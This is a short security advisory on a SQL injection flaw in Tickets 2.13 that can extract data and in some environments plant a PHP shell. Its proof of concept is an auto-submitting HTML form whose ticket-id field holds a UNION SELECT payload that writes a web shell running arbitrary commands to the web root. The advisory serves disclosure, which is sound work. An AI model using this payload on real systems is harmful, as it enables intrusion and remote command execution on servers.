Home
Consulting
Advisories
Software
Articles
Contact

Tickets 2.13 SQL Injection

Legacy Advisories

Description

A sql injection vulnerability in Tickets 2.13 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.

Proof Of Concept

<html>
 <body onload="document.forms[0].submit()"> 
  <form method="POST" action="http://localhost/tickets/add_note.php">  
   <input type="hidden" name="frm_ticket_id" value="0 UNION SELECT '<?php echo system($_GET["CMD"]); ?>','','','','','','','','','','','','','','','','','','','','','','','','','' FROM dual INTO OUTFILE '../../htdocs/shell.php';#" />   
  </form>
 </body>
</html>


Copyright © 2018 AutoSec Tools LLC